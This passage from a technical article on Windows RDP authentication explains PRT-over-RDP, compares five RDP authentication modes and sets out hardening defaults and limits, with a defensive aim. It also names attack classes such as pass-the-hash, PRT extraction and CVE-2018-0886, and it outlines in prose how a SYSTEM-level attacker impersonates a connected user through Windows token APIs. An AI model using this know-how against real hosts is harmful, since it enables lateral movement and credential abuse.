&lt;p&gt;The shipping vehicle was the October 2022 cumulative updates: KB5018418 (Windows 11), KB5018410 (Windows 10 20H2+), and KB5018421 (Windows Server 2022). KB5018418&apos;s release notes pin the date precisely: &quot;Release Date: 10/11/2022. Version: OS Build 22000.1098&quot; [@msl-kb5018418]. The Microsoft Learn page for the feature lists the same prerequisites: &quot;The remote PC and your local device must be running one of the following operating systems: Windows 11 with 2022-10 Cumulative Updates for Windows 11 (KB5018418) or later installed&quot; [@msl-prtrdp-mstsc].&lt;/p&gt;

PRT-over-RDP (Microsoft&apos;s official name: &quot;Microsoft Entra single sign-on for Remote Desktop&quot;) is sometimes attributed to &quot;2025.&quot; The misreading is worth defusing because the date affects what one believes is on the deployment frontier.&lt;p&gt;The feature shipped in October 2022 [@msl-prtrdp-mstsc, @msl-kb5018418]. The 2025 angles are two: Windows 11 24H2 reached broad consumer GA in October 2024, and a CredSSP/RDP regression in 24H2 produced session hangs and 65-second disconnects in early 2025; Microsoft rolled out a Known Issue Rollback (&quot;KIR&quot;) via Group Policy in March 2025, and the Windows 11 24H2 release-health page now reads &quot;There are no active known issues at this time&quot; as of March 27, 2025 [@msl-24h2-status]. PRT-over-RDP itself has been a generally-available feature since October 2022; the 2025 events were deployment-stack stability work, not feature ship dates.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;The wire protocol&lt;/h3&gt;
&lt;p&gt;Microsoft introduced a new value for &lt;code&gt;requestedProtocols&lt;/code&gt; -- &lt;code&gt;PROTOCOL_RDSAAD = 0x10&lt;/code&gt; [@rdpbcgr-negreq] -- and an entirely new sub-protocol underneath it, &quot;RDS AAD Auth.&quot; Section 5.4.5.4 of MS-RDPBCGR documents it verbatim: &quot;RDS AAD Auth is a variation of Enhanced RDP Security that is used to authenticate a user to an Azure AD-joined device or to a Hybrid Azure AD-joined device. Server authentication, encryption, decryption, and data integrity checks are implemented by using the TLS security protocol, while user authentication is accomplished by exchanging RDS AAD Auth PDUs directly following the TLS handshake&quot; [@rdpbcgr-rdsaad].&lt;/p&gt;
&lt;p&gt;The CredSSP exchange is &lt;em&gt;replaced entirely&lt;/em&gt;. No SPNEGO. No Kerberos. No NTLM. No &lt;code&gt;TSCredentials&lt;/code&gt;. The TLS handshake still happens, because TLS is providing the wire confidentiality and server authentication. After the TLS handshake, the new RDS-AAD-Auth PDU stream takes over. The user-side credential becomes a PRT-cookie scoped to a Conditional Access application.&lt;/p&gt;

A long-lived OAuth refresh token bound to a Microsoft-Entra-joined or hybrid-joined device. The PRT holds proof of the user&apos;s primary authentication (typically including a Windows Hello for Business gesture or FIDO2 ceremony) and signs short-lived JWT cookies that authenticate the user to Entra-ID-integrated applications. The PRT&apos;s signing key is held in the device&apos;s TPM where possible. See the companion *Entra ID and the Primary Refresh Token* article on this site for the full mechanism.

The Cloud Authentication Provider, an LSA authentication package introduced for Microsoft Entra ID (then Azure AD) sign-in. CloudAP runs inside `lsass.exe` and manages PRT issuance, refresh, and the minting of PRT-cookies for downstream authentication. On the target side of a PRT-over-RDP session, CloudAP validates the inbound PRT-cookie and produces the user&apos;s Windows session token without ever contacting a domain controller [@mollema-prt2].
&lt;h3&gt;The mechanism: from &lt;code&gt;.rdp&lt;/code&gt; file to Entra-issued session&lt;/h3&gt;
&lt;p&gt;The client-side flow starts with an &lt;code&gt;.rdp&lt;/code&gt; connection file that includes &lt;code&gt;enablerdsaadauth:i:1&lt;/code&gt; [@msl-rdp-files]. The official MSTSC user-facing label is &quot;Use a web account to sign in to the remote computer.&quot; When the user clicks Connect:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The local CloudAP plugin generates a PRT-cookie scoped to the Conditional Access application &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; (&quot;Microsoft Remote Desktop&quot;). The Microsoft Learn documentation pins this app ID verbatim: &quot;Conditional Access policies can be applied to the application &lt;strong&gt;Microsoft Remote Desktop&lt;/strong&gt; with ID &lt;strong&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/strong&gt; to control access to the remote PC when single sign-on is enabled&quot; [@msl-prtrdp-mstsc].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mstsc.exe&lt;/code&gt; opens TCP/3389 (or UDP/3389 for Shortpath) and sends &lt;code&gt;RDP_NEG_REQ&lt;/code&gt; with &lt;code&gt;requestedProtocols = PROTOCOL_RDSAAD (0x10)&lt;/code&gt; [@rdpbcgr-negreq].&lt;/li&gt;
&lt;li&gt;TLS handshake completes; the target&apos;s server certificate is validated against the Entra device-identity.&lt;/li&gt;
&lt;li&gt;The client sends RDS-AAD-Auth PDUs containing the PRT-cookie [@rdpbcgr-rdsaad].&lt;/li&gt;
&lt;li&gt;The target&apos;s CloudAP plugin validates the cookie against Microsoft Entra ID. Entra ID evaluates the Conditional Access policies that target &lt;code&gt;a4a365df-...&lt;/code&gt;, including device compliance, location, sign-in risk, and Authentication Strength.&lt;/li&gt;
&lt;li&gt;On success, Entra ID issues an access token scoped to the target. The target&apos;s CloudAP plugin signs the user in. The RDP session starts.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    autonumber
    participant C as Caller (CloudAP + mstsc)
    participant T as Target (CloudAP + termsrv)
    participant E as Microsoft Entra ID
    C-&amp;gt;&amp;gt;C: CloudAP mints PRT-cookie for a4a365df
    C-&amp;gt;&amp;gt;T: RDP_NEG_REQ (PROTOCOL_RDSAAD 0x10)
    T--&amp;gt;&amp;gt;C: RDP_NEG_RSP (PROTOCOL_RDSAAD selected)
    C-&amp;gt;&amp;gt;T: TLS handshake
    C-&amp;gt;&amp;gt;T: RDS-AAD-Auth PDU with PRT-cookie
    T-&amp;gt;&amp;gt;E: Validate cookie + apply CA policies
    E--&amp;gt;&amp;gt;T: Access token for target SPN
    T-&amp;gt;&amp;gt;T: CloudAP signs user in
    C-&amp;gt;&amp;gt;T: RDP session as Entra principal

The `.rdp` connection-file property that opts into RDS-AAD-Auth (PRT-over-RDP) [@msl-rdp-files]. Verbatim from Microsoft Learn: &quot;Determines whether the client will use Microsoft Entra ID to authenticate to the remote PC. When used with Azure Virtual Desktop, this provides a single sign-on experience. This property replaces the property `targetisaadjoined`.&quot; The two valid values are `0` (disable) and `1` (enable).
&lt;h3&gt;Two GUIDs, two purposes&lt;/h3&gt;
&lt;p&gt;PRT-over-RDP brings two distinct Microsoft Entra IDs into play, and the article must keep them separate.The user-facing Conditional Access application &quot;Microsoft Remote Desktop&quot; has the application ID &lt;code&gt;a4a365df-50f1-4397-bc59-1a1564b8bb9c&lt;/code&gt; [@msl-prtrdp-mstsc]. The AVD-side configuration uses a distinct service principal &quot;Windows Cloud Login&quot; with ID &lt;code&gt;270efc09-cd0d-444b-a71f-39af4910ec45&lt;/code&gt; [@msl-avdsso], configured via &lt;code&gt;Update-MgServicePrincipal ... -Settings @{ isRemoteDesktopProtocolEnabled = $true }&lt;/code&gt;. Both IDs exist for legitimate reasons; both pages are alive; they configure different layers. The Conditional Access policy in the admin console targets &lt;code&gt;a4a365df-...&lt;/code&gt;; the AVD-side enablement flag flips on &lt;code&gt;270efc09-...&lt;/code&gt;. The &lt;code&gt;a4a365df-...&lt;/code&gt; application is the user-facing PRT-cookie audience; Conditional Access policies that gate RDP sign-in (require WHfB, require compliant device, block from foreign geographies) target this app ID. The &lt;code&gt;270efc09-...&lt;/code&gt; service principal is the AVD-side enablement flag for the configuration described in Azure Virtual Desktop documentation: &quot;Your session hosts must be Microsoft Entra joined or Microsoft Entra hybrid joined. Session hosts joined to Microsoft Entra Domain Services or to Active Directory Domain Services only aren&apos;t supported&quot; [@msl-avdsso].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PRT-over-RDP is the first RDP authentication mode whose wire-protocol selector does not have a CredSSP underneath it. &lt;code&gt;PROTOCOL_RDSAAD (0x10)&lt;/code&gt; [@rdpbcgr-negreq] is its own path. The user&apos;s credential is a JWT cookie [@msl-prtrdp-mstsc] signed by a key derived from the device&apos;s session key (and bound to the TPM where possible). There is no NTLM hash to extract from the target; there is no Kerberos session key to relay. The residual surface is PRT-extraction from the &lt;em&gt;caller&apos;s&lt;/em&gt; CloudAP cache -- not from the target.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;PRT-over-RDP is the first RDP authentication mode that is intrinsically phishing-resistant when paired with Windows Hello for Business [@msl-prtrdp-mstsc]. It is also the first mode that requires both endpoints to be Microsoft-Entra-joined (or hybrid-joined) [@msl-avdsso]. A 2026 enterprise estate ends up running all five modes in parallel -- none retiring the others -- because no single Pareto-optimal point dominates the others.&lt;/p&gt;
&lt;h2&gt;8. Five Modes, One Matrix, 2026 Operational Reality&lt;/h2&gt;
&lt;p&gt;By 2026 the RDP authentication stack ships five compositional modes, negotiated by two distinct mechanisms in MS-RDPBCGR. The &lt;code&gt;requestedProtocols&lt;/code&gt; field [@rdpbcgr-negreq] selects between classic RDP, TLS, CredSSP, and RDS-AAD-Auth. The &lt;code&gt;flags&lt;/code&gt; byte signals the Restricted Admin and Remote Credential Guard sub-modes inside CredSSP. A real estate runs all five in different connection paths. None of them retire the others.&lt;/p&gt;
&lt;p&gt;The Microsoft Learn page for Remote Credential Guard publishes the canonical practitioner-grade comparison matrix [@msl-rcg]. Reproducing it verbatim:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Remote Desktop&lt;/th&gt;
&lt;th&gt;Remote Credential Guard&lt;/th&gt;
&lt;th&gt;Restricted Admin&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Single sign-on (SSO) for sessions&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-hop RDP&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent use of user&apos;s identity during connection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent use of credentials after disconnection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent Pass-the-Hash&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported authentication&lt;/td&gt;
&lt;td&gt;Any negotiable by SSP&lt;/td&gt;
&lt;td&gt;Kerberos only&lt;/td&gt;
&lt;td&gt;Any negotiable by SSP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credentials supported from the client device&lt;/td&gt;
&lt;td&gt;Signed-in creds, supplied creds, saved creds&lt;/td&gt;
&lt;td&gt;Signed-in creds only&lt;/td&gt;
&lt;td&gt;Signed-in creds, supplied creds, saved creds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RDP access granted with&lt;/td&gt;
&lt;td&gt;Remote Desktop Users (target)&lt;/td&gt;
&lt;td&gt;Remote Desktop Users (target)&lt;/td&gt;
&lt;td&gt;Administrators (target)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The matrix anchors three points of precision. First, &quot;Prevent use of user&apos;s identity during connection&quot; is &lt;code&gt;No&lt;/code&gt; for both classic Remote Desktop &lt;em&gt;and&lt;/em&gt; Remote Credential Guard. Only Restricted Admin can promise that the user&apos;s identity is not exercised on the target -- because only Restricted Admin replaces the user&apos;s identity with the target&apos;s machine identity.&lt;/p&gt;
&lt;p&gt;Second, &quot;Prevent use of credentials after disconnection&quot; is &lt;code&gt;Yes&lt;/code&gt; for Remote CG and Restricted Admin but &lt;code&gt;No&lt;/code&gt; for classic. Third, &quot;RDP access granted with&quot; is the &lt;em&gt;access control&lt;/em&gt; primitive, not the &lt;em&gt;credential&lt;/em&gt; primitive: Restricted Admin demands Administrators-group membership on the target because the user is impersonating the machine account.&lt;/p&gt;
&lt;p&gt;The matrix excludes the two non-CredSSP modes -- classic-RDP (&lt;code&gt;PROTOCOL_RDP = 0x00&lt;/code&gt;) and PRT-over-RDP (&lt;code&gt;PROTOCOL_RDSAAD = 0x10&lt;/code&gt;). Extending the matrix to all five modes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Classic RDP&lt;/th&gt;
&lt;th&gt;NLA (CredSSP)&lt;/th&gt;
&lt;th&gt;Restricted Admin&lt;/th&gt;
&lt;th&gt;Remote Credential Guard&lt;/th&gt;
&lt;th&gt;PRT-over-RDP&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Wire selector&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PROTOCOL_RDP 0x00&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PROTOCOL_HYBRID 0x02&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;CredSSP + &lt;code&gt;0x01&lt;/code&gt; flag&lt;/td&gt;
&lt;td&gt;CredSSP + &lt;code&gt;0x02&lt;/code&gt; flag&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PROTOCOL_RDSAAD 0x10&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential delivered to target&lt;/td&gt;
&lt;td&gt;Password in RC4 channel&lt;/td&gt;
&lt;td&gt;Password in TLS (TSPasswordCreds)&lt;/td&gt;
&lt;td&gt;Empty TSPasswordCreds&lt;/td&gt;
&lt;td&gt;TSRemoteGuardCreds handle&lt;/td&gt;
&lt;td&gt;Entra PRT-cookie (JWT)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Target session identity&lt;/td&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;Machine (&lt;code&gt;TARGET$&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;User&lt;/td&gt;
&lt;td&gt;User (Entra principal)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User credential at target lsass&lt;/td&gt;
&lt;td&gt;Yes (NT-OWF + plaintext)&lt;/td&gt;
&lt;td&gt;Yes (NT-OWF)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSO to downstream services&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (via caller RPC)&lt;/td&gt;
&lt;td&gt;Yes (Entra token cache)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-hop RDP&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (Entra)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Requires Administrators on target&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NTLM fallback allowed&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pre-auth-RCE protection (NLA)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (via TLS-first gate)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;First shipped&lt;/td&gt;
&lt;td&gt;RDP 4.0 / 1998&lt;/td&gt;
&lt;td&gt;RDP 6.0 / Vista / Nov 2006&lt;/td&gt;
&lt;td&gt;Win 8.1 / Server 2012 R2 / Oct 17, 2013&lt;/td&gt;
&lt;td&gt;Win 10 1607 / Server 2016 / Aug 2, 2016&lt;/td&gt;
&lt;td&gt;KB5018418 / Oct 11, 2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Canonical CVE&lt;/td&gt;
&lt;td&gt;BlueKeep (channel-setup)&lt;/td&gt;
&lt;td&gt;CVE-2018-0886 (CredSSP RCE)&lt;/td&gt;
&lt;td&gt;RBCD against TERMSRV&lt;/td&gt;
&lt;td&gt;Kerberos RBCD residual&lt;/td&gt;
&lt;td&gt;PRT-extraction at session host&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The five modes are not strictly ordered. Each occupies a different point on the Pareto frontier of (no-credential-leak × SSO × universality × Kerberos-compatibility). An operator&apos;s job is to choose two of {Entra-issued sessions, on-prem Kerberos SSO, no credential delegation, no local-admin requirement} per RDP pair -- the matrix exists because nobody gets all four.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 2026 operational defaults split along clean lines. The universal baseline is &lt;code&gt;NLA mandatory&lt;/code&gt; (refuse &lt;code&gt;PROTOCOL_RDP = 0x00&lt;/code&gt;), &lt;code&gt;AllowEncryptionOracle = 0&lt;/code&gt; (Force Updated Clients) [@msl-kb4093492], NTLMv1 disabled at the domain controller, and the target-side GPO &quot;Remote host allows delegation of nonexportable credentials&quot; set so Remote CG can opt in without prompting. On top of that baseline:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Admin-tier jump servers: Restricted Admin (&lt;code&gt;RestrictedRemoteAdministration&lt;/code&gt; GPO mode 1, &quot;Require Restricted Admin&quot;) [@msl-rcg].&lt;/li&gt;
&lt;li&gt;User-tier domain RDP: Remote Credential Guard (&lt;code&gt;RestrictedRemoteAdministration&lt;/code&gt; GPO mode 2 for &quot;Require Remote Credential Guard&quot;, or mode 3 for &quot;Restrict credential delegation&quot; -- the composite that prefers Remote CG and falls back to Restricted Admin when Remote CG cannot complete) [@msl-rcg].&lt;/li&gt;
&lt;li&gt;Entra-joined estates and AVD / Cloud-PC: PRT-over-RDP via &lt;code&gt;enablerdsaadauth:i:1&lt;/code&gt; [@msl-rdp-files], gated by Conditional Access on the &lt;code&gt;a4a365df-...&lt;/code&gt; app [@msl-prtrdp-mstsc].&lt;/li&gt;
&lt;li&gt;Legacy compatibility lane: NLA-mandatory classic CredSSP, accepting that the target&apos;s lsass will hold credential material for the session duration.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Regardless of which higher-level mode you choose, four settings should be on every Windows target before you read further: NLA mandatory; &lt;code&gt;AllowEncryptionOracle = 0&lt;/code&gt; [@msl-kb4093492]; NTLMv1 disabled; &quot;Remote host allows delegation of nonexportable credentials&quot; set so Remote CG opt-in does not prompt. These four are the floor. Everything else is a per-target choice on top of them.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The matrix is the load-bearing artifact. The next four sections walk what it does not solve: the perimeter mitigations the matrix excludes, the theoretical limits no mode can close, the open problems still in the literature, and the practical guide an operator runs on Monday.&lt;/p&gt;
&lt;h2&gt;9. Adjacent Mitigations: What Else Protects RDP (And What It Does Not Protect)&lt;/h2&gt;
&lt;p&gt;Six adjacent mechanisms get called &quot;RDP security&quot; in vendor marketing. None of them are credential-protection mechanisms. They solve different problems at different layers, and conflating them with the five-mode matrix is the load-bearing operational confusion in modern RDP deployments.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Remote Desktop Gateway / RDS Gateway.&lt;/strong&gt; A network-layer reverse-proxy that tunnels RDP inside HTTPS on TCP/443. The Gateway terminates the TLS connection from the internet, authenticates the user (often via smart card or Microsoft Entra), and forwards the inner RDP session to the back-end target. Gateway solves &quot;RDP exposed to the internet on TCP/3389.&quot; It does not change which CredSSP sub-mode the inner session negotiates. If the inner session is classic-NLA, the target&apos;s lsass receives the user&apos;s NT-OWF, gateway or not.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A common misconception is that an RDS Gateway &quot;protects credentials.&quot; It does not. The Gateway proxies the RDP session, which still negotiates classic, Restricted Admin, Remote CG, or PRT-over-RDP between the client and the back-end target. The Gateway is a perimeter primitive, not an authentication mode. An operator who deploys RDS Gateway &lt;em&gt;and&lt;/em&gt; enforces Remote CG on the back-end pool has stacked two complementary mitigations. An operator who deploys RDS Gateway and leaves the back-end pool on classic NLA has hardened the perimeter without changing the post-exploitation pivot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Just-Enough Administration (JEA) over PowerShell Remoting.&lt;/strong&gt; The &quot;don&apos;t use RDP for admin in the first place&quot; answer. JEA constrains a PowerShell Remoting session to a curated set of cmdlets executed under a managed virtual account. The transport is WSMan over HTTPS (TCP/5986 with TLS, or TCP/5985 plain), not RDP.&lt;/p&gt;
&lt;p&gt;WSMan has its own CredSSP exposure -- CVE-2018-0886 affects WinRM as well as RDP [@nvd-2018-0886] -- but a JEA endpoint configured for &lt;code&gt;RunAsVirtualAccount&lt;/code&gt; does not delegate the operator&apos;s credentials at all. JEA combined with Remote Credential Guard for the remaining graphical-admin paths is the de facto 2026 reference architecture for admin-tier work.&lt;/p&gt;

A PowerShell-Remoting feature that constrains a remote session to a whitelisted set of commands executed under a managed virtual account, eliminating credential delegation for the operator. JEA is not an RDP mode; it is the &quot;use a different protocol entirely&quot; alternative for administrative tasks that do not need a graphical session. Configured via PowerShell session-configuration files (`.pssc`) and role-capability files (`.psrc`).
&lt;p&gt;&lt;strong&gt;Smart-card and FIDO2 as the underlying credential.&lt;/strong&gt; A user can authenticate to NLA / CredSSP using a smart card (Kerberos with PKINIT) or, for PRT-over-RDP, a Windows Hello for Business or FIDO2 ceremony. The credential type matters for &lt;em&gt;phishing resistance&lt;/em&gt; and for &lt;em&gt;replayability&lt;/em&gt;. It does not change what the target ends up with after the CredSSP exchange completes. A smart-card-backed NLA session still ends with a Kerberos session key in the target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt;. Phishing-resistant authentication is necessary but not sufficient; the post-exchange credential isolation lives in Restricted Admin, Remote CG, or PRT-over-RDP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Azure Bastion / AWS Session Manager.&lt;/strong&gt; Cloud-managed jump-host services that present a web UI and proxy RDP / SSH connections to back-end VMs without exposing 3389 to the internet. Bastion handles the network-layer exposure problem. The credential-protection guarantees still depend on which CredSSP sub-mode the inner RDP session negotiates. Bastion does not magic away the requirement to also configure Restricted Admin or Remote CG on the back-end pool.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RDP-over-QUIC / AVD RDP Shortpath.&lt;/strong&gt; The Microsoft Azure Virtual Desktop &quot;Shortpath&quot; feature carries RDP traffic over UDP, with four variants documented verbatim on Microsoft Learn: &quot;RDP Shortpath for managed networks; RDP Shortpath for managed networks with ICE/STUN; RDP Shortpath for public networks with ICE/STUN; RDP Shortpath for public networks via TURN&quot; [@msl-shortpath]. The transport sits on QUIC, the UDP-based transport standardised in RFC 9000 [@rfc-9000].&lt;/p&gt;
&lt;p&gt;The Tech Community announcement of public-networks GA states verbatim: &quot;We are pleased to announce the general availability of RDP Shortpath for public networks... We started deploying RDP Shortpath in September and now the feature is 100% rolled out&quot; [@tc-shortpath-blog]; the announcement is dated late 2022. The TURN-relayed variant is GA in late 2024 per the Microsoft AVD blog series.&lt;/p&gt;

Microsoft&apos;s QUIC/UDP transport for RDP, used inside Azure Virtual Desktop and Windows 365 [@msl-shortpath]. Four variants cover managed networks, ICE/STUN-mediated traversal, public-network NAT traversal, and TURN-relayed paths through restrictive NAT. The authentication stack above the transport is unchanged from TCP-based RDP; QUIC replaces TCP/TLS with UDP/QUIC at the bottom of the stack only.
&lt;p&gt;What changes with QUIC transport is the detection surface. Network sensors keyed on &lt;code&gt;TCP/3389 + TLS handshake + CredSSP TS Request/Response&lt;/code&gt; see nothing for an AVD Shortpath session; what they should look for instead is &lt;code&gt;UDP/&amp;amp;lt;ephemeral&amp;amp;gt; + QUIC handshake + STUN/ICE candidate exchange&lt;/code&gt;. The credential-protection guarantees are &lt;em&gt;identical&lt;/em&gt; to the underlying RDP mode; the visibility-engineering work is real.FreeRDP and xrdp -- the two widely-used non-Microsoft RDP stacks -- implement a subset of the five modes. xrdp does not implement CredSSP server-side, so xrdp targets are reachable only via &lt;code&gt;PROTOCOL_RDP&lt;/code&gt; or &lt;code&gt;PROTOCOL_SSL&lt;/code&gt;; an operator who enables NLA on an xrdp host has effectively prevented Windows clients from connecting. FreeRDP supports classic, NLA / CredSSP, and Restricted Admin as a client, but does not implement Remote Credential Guard or PRT-over-RDP. Detection engineering for mixed-stack estates must account for these limits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conditional Access, Microsoft Entra PIM, Just-In-Time access.&lt;/strong&gt; Workflow-level controls that &lt;em&gt;grant&lt;/em&gt; RDP access (the user must satisfy a PIM activation request before the JIT-provisioned admin group adds them; the Conditional Access policy must pass before the PRT-cookie is minted). These are orthogonal to what happens &lt;em&gt;during&lt;/em&gt; the RDP session. A PIM-elevated admin session that runs classic-NLA RDP still leaves the admin&apos;s credential in the target&apos;s lsass when the session ends.&lt;/p&gt;
&lt;p&gt;None of these mechanisms change the credential the target ends up with. That is the load-bearing fact. The next section walks the four classes of attack that no RDP mode -- regardless of how many adjacent mitigations are stacked -- can close.&lt;/p&gt;
&lt;h2&gt;10. Theoretical Limits: The Four Things RDP Authentication Cannot Close&lt;/h2&gt;
&lt;p&gt;The five modes between them close credential delegation (Restricted Admin), credential-after-disconnection (Restricted Admin and Remote CG), the password-and-hash entirely (PRT-over-RDP), and the pre-auth channel-setup surface (NLA). The four limits below are what is left. Each has a formal lower bound. None is closable by a sixth mode.&lt;/p&gt;
&lt;h3&gt;Limit 1: The SYSTEM-on-target floor&lt;/h3&gt;
&lt;p&gt;Any RDP mode that grants the user an actionable identity on the target permits a &lt;code&gt;SYSTEM&lt;/code&gt;-on-target adversary to use that identity for as long as the user stays connected. The session host kernel must materialise the user&apos;s security token to enforce ACL checks. An attacker with &lt;code&gt;SYSTEM&lt;/code&gt; on the target can call &lt;code&gt;OpenProcessToken&lt;/code&gt; against any process in the user&apos;s session, then &lt;code&gt;DuplicateTokenEx&lt;/code&gt; and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to perform actions as the user. Microsoft Learn encodes this as &quot;Prevent use of user&apos;s identity during connection: No&quot; for both Remote Desktop and Remote Credential Guard [@msl-rcg].&lt;/p&gt;

Remote Credential Guard helps protecting credentials over a Remote Desktop (RDP) connection by redirecting Kerberos requests back to the device that&apos;s requesting the connection. If the target device is compromised, the credentials aren&apos;t exposed because both credential and credential derivatives are never passed over the network to the target device. -- Microsoft Learn [@msl-rcg]
&lt;p&gt;That sentence promises protection of &lt;em&gt;credentials&lt;/em&gt;. It does not promise protection of the user&apos;s identity in-session. The two properties are different and only one is closable by an authentication-protocol redesign.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; No RDP mode can simultaneously give the target the ability to act as the user &lt;em&gt;and&lt;/em&gt; prevent a SYSTEM adversary on the target from acting as the user. The defense is not to close in-session impersonation; the defense is to not put the user on a compromised target. Restricted Admin closes it by giving up the user&apos;s identity entirely. Every mode that preserves the user&apos;s identity (classic, NLA, Remote CG, PRT-over-RDP) leaves the SYSTEM-on-target floor open.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Limit 2: The CredSSP residue&lt;/h3&gt;
&lt;p&gt;Even on a 2026 Entra-joined estate using PRT-over-RDP, CredSSP remains on the wire for every RDP path touching a non-Entra-joined endpoint. Legacy admin tooling, multi-hop sessions into on-prem servers, RDS deployments, hybrid scenarios -- all of them fall back to CredSSP. CredSSP has shipped at least one logical-flaw RCE (CVE-2018-0886) [@nvd-2018-0886] and the &lt;code&gt;AllowEncryptionOracle&lt;/code&gt; compatibility window [@msl-kb4093492] remains a deployment hazard whenever a new CredSSP patch ships.&lt;/p&gt;
